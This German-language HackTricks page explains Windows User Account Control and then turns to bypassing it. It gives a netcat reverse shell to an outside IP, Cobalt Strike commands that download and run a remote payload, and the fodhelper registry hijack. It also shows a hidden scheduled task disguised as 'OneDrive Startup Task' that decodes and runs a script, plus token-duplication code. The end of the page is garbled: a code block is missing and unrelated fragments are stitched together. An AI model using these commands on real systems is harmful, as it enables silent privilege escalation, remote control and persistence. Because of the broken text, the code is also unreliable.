UAC - Benutzerkontensteuerung

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

UAC

User Account Control (UAC) ist eine Funktion, die eine Zustimmungsaufforderung für Aktionen mit erhöhten Rechten ermöglicht. Anwendungen haben unterschiedliche integrity levels, und ein Programm mit einem hohen Level kann Aufgaben ausführen, die das System potenziell kompromittieren könnten. Wenn UAC aktiviert ist, laufen Anwendungen und Aufgaben immer im Sicherheitskontext eines Nicht-Administrator-Kontos, es sei denn, ein Administrator gewährt diesen Anwendungen/Aufgaben ausdrücklich Administratorzugriff, um ausgeführt zu werden. Es ist eine Komfortfunktion, die Administratoren vor unbeabsichtigten Änderungen schützt, aber nicht als Sicherheitsgrenze gilt.

Weitere Informationen zu Integritätsstufen:

Integrity Levels

Wenn UAC aktiv ist, erhält ein Administratorbenutzer zwei Tokens: ein Standardbenutzertoken, um normale Aktionen auf Standardniveau auszuführen, und eines mit Administratorprivilegien.

Diese page erläutert ausführlich, wie UAC funktioniert und behandelt den Anmeldeprozess, die Benutzererfahrung und die UAC-Architektur. Administratoren können Sicherheitsrichtlinien verwenden, um zu konfigurieren, wie UAC für ihre Organisation lokal funktioniert (mittels secpol.msc), oder zentral über Group Policy Objects (GPO) in einer Active Directory-Domänenumgebung verteilt wird. Die verschiedenen Einstellungen werden detailliert here beschrieben. Es gibt 10 Group Policy-Einstellungen, die für UAC gesetzt werden können. Die folgende Tabelle liefert zusätzliche Details:

Richtlinien zur Installation von Software unter Windows

Die lokalen Sicherheitsrichtlinien (“secpol.msc” auf den meisten Systemen) sind standardmäßig so konfiguriert, dass sie Nicht-Administratoren daran hindern, Softwareinstallationen durchzuführen. Das bedeutet, dass selbst wenn ein Nicht-Administrator den Installer für Ihre Software herunterladen kann, er ihn ohne ein Administratorkonto nicht ausführen kann.

Registrierungsschlüssel, um UAC zur Abfrage einer Erhöhung zu zwingen

Als Standardbenutzer ohne Administratorrechte können Sie sicherstellen, dass das “Standard”-Konto von UAC um Anmeldeinformationen aufgefordert wird, wenn es versucht, bestimmte Aktionen auszuführen. Diese Maßnahme würde das Ändern bestimmter Registrierungsschlüssel erfordern, wofür Sie Administratorrechte benötigen, es sei denn, es existiert ein UAC bypass oder der Angreifer ist bereits als Administrator eingeloggt.

Selbst wenn sich der Benutzer in der Administrators-Gruppe befindet, zwingen diese Änderungen den Benutzer dazu, seine Kontenanmeldeinformationen erneut einzugeben, um administrative Aktionen durchzuführen.

Der einzige Nachteil ist, dass dieser Ansatz UAC deaktiviert benötigt, um zu funktionieren, was in Produktionsumgebungen unwahrscheinlich ist.

Die Registrierungsschlüssel und Einträge, die Sie ändern müssen, sind die folgenden (mit ihren Standardwerten in Klammern):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

Dies kann auch manuell über das Tool “Local Security Policy” durchgeführt werden. Nach der Änderung werden administrative Vorgänge den Benutzer dazu auffordern, seine Anmeldeinformationen erneut einzugeben.

Hinweis

User Account Control ist keine Sicherheitsgrenze. Daher können Standardbenutzer nicht aus ihren Konten ausbrechen und Administratorrechte erlangen, ohne einen local privilege escalation exploit.

Fordere ‘vollen Computerzugriff’ von einem Benutzer an

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

UAC-Berechtigungen

• Internet Explorer Protected Mode verwendet Integritätsprüfungen, um zu verhindern, dass Prozesse mit hohem Integritätslevel (wie Webbrowser) auf Daten mit niedrigem Integritätslevel (wie den Ordner für temporäre Internetdateien) zugreifen. Dies wird erreicht, indem der Browser mit einem Low-Integrity-Token ausgeführt wird. Wenn der Browser versucht, auf Daten in der Low-Integrity-Zone zuzugreifen, prüft das Betriebssystem das Integritätslevel des Prozesses und gewährt den Zugriff entsprechend. Diese Funktion hilft zu verhindern, dass Remote-Code-Ausführungsangriffe Zugriff auf sensible Daten auf dem System erhalten.
• Wenn sich ein Benutzer bei Windows anmeldet, erstellt das System ein Access-Token, das eine Liste der Benutzerprivilegien enthält. Privilegien sind die Kombination aus Rechten und Fähigkeiten eines Benutzers. Das Token enthält außerdem eine Liste der Benutzeranmeldeinformationen, also der Credentials, die zur Authentifizierung des Benutzers gegenüber dem Computer und Netzwerkressourcen verwendet werden.

Autoadminlogon

Um Windows so zu konfigurieren, dass ein bestimmter Benutzer beim Start automatisch angemeldet wird, setzen Sie den AutoAdminLogon registry key. Das ist nützlich für Kiosk-Umgebungen oder Testzwecke. Verwenden Sie dies nur auf sicheren Systemen, da das Passwort in der Registry preisgegeben wird.

Setzen Sie die folgenden Keys mit dem Registry-Editor oder reg add:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

Um zum normalen Anmeldeverhalten zurückzukehren, setzen Sie AutoAdminLogon auf 0.

UAC bypass

Tip

Beachten Sie, dass wenn Sie grafischen Zugriff auf das Opfer haben, ein UAC bypass sehr einfach ist, da Sie beim Erscheinen der UAC-Eingabeaufforderung einfach auf “Yes” klicken können

Der UAC bypass wird in folgendem Fall benötigt: UAC ist aktiviert, Ihr Prozess läuft in einem mittleren Integritätskontext, und Ihr Benutzer gehört zur Administrators-Gruppe.

Wichtig ist zu erwähnen, dass es viel schwieriger ist, UAC zu umgehen, wenn es auf dem höchsten Sicherheitslevel (Always) eingestellt ist, als wenn es auf einem der anderen Level (Default) steht.

UAC disabled

Wenn UAC bereits deaktiviert ist (ConsentPromptBehaviorAdmin ist 0) können Sie eine reverse shell mit Admin-Rechten (hohes Integritätslevel) ausführen, z. B. mit:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Sehr grundlegender UAC “bypass” (vollständiger Dateisystemzugriff)

Wenn du eine Shell mit einem Benutzer hast, der zur Administrators group gehört, kannst du das C$-Share über SMB lokal in ein neues Laufwerk mounten und hast dadurch Zugriff auf alles im Dateisystem (sogar auf den Administrator-Home-Ordner).

Warning

Sieht so aus, als würde dieser Trick nicht mehr funktionieren

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC bypass mit cobalt strike

Die Cobalt Strike-Techniken funktionieren nur, wenn UAC nicht auf seine maximale Sicherheitsstufe eingestellt ist.

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire und Metasploit haben ebenfalls mehrere Module, um die UAC zu bypass.

KRBUACBypass

Dokumentation und Tool unter https://github.com/wh0amitz/KRBUACBypass

UAC bypass Exploits

UACME , welches eine Kompilation mehrerer UAC bypass Exploits ist. Beachte, dass du UACME mit Visual Studio oder msbuild kompilieren musst. Die Kompilierung erstellt mehrere ausführbare Dateien (z. B. Source\Akagi\outout\x64\Debug\Akagi.exe), du musst wissen, welche du brauchst.
Du solltest vorsichtig sein, weil einige Bypasses andere Programme aufrufen, die den Benutzer warnen, dass etwas passiert.

UACME enthält die Build-Version, ab der jede Technik funktionierte. Du kannst nach einer Technik suchen, die deine Versionen betrifft:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Außerdem erhält man über die this Seite die Windows-Release 1607 aus den Build-Versionen.

UAC Bypass – fodhelper.exe (Registry hijack)

Die vertrauenswürdige Binary fodhelper.exe wird in modernen Windows automatisch erhöht. Beim Start fragt sie den unten stehenden, pro-Benutzer-Registrierungspfad ab, ohne das DelegateExecute-Verb zu validieren. Dort einen Befehl zu platzieren erlaubt einem Medium Integrity-Prozess (Benutzer ist in Administrators), einen High Integrity-Prozess ohne UAC-Aufforderung zu starten.

Vom fodhelper abgefragter Registrierungspfad:

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
Hinweise:
- Funktioniert, wenn der aktuelle Benutzer Mitglied der Gruppe Administrators ist und das UAC-Level standardmäßig/locker eingestellt ist (nicht Always Notify mit zusätzlichen Einschränkungen).
- Verwende den `sysnative`-Pfad, um eine 64-Bit PowerShell aus einem 32-Bit-Prozess auf 64-Bit-Windows zu starten.
- Die Payload kann jeder Befehl sein (PowerShell, cmd oder ein EXE-Pfad). Vermeide UI-Prompts für bessere Tarnung.

#### CurVer/extension hijack variant (HKCU only)

Neuere Samples, die `fodhelper.exe` missbrauchen, umgehen `DelegateExecute` und stattdessen **redirect the `ms-settings` ProgID** über den pro-Benutzer-`CurVer`-Wert. Die auto-elevated binary löst den Handler weiterhin unter `HKCU` auf, sodass kein Admin-Token benötigt wird, um die Schlüssel zu setzen:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"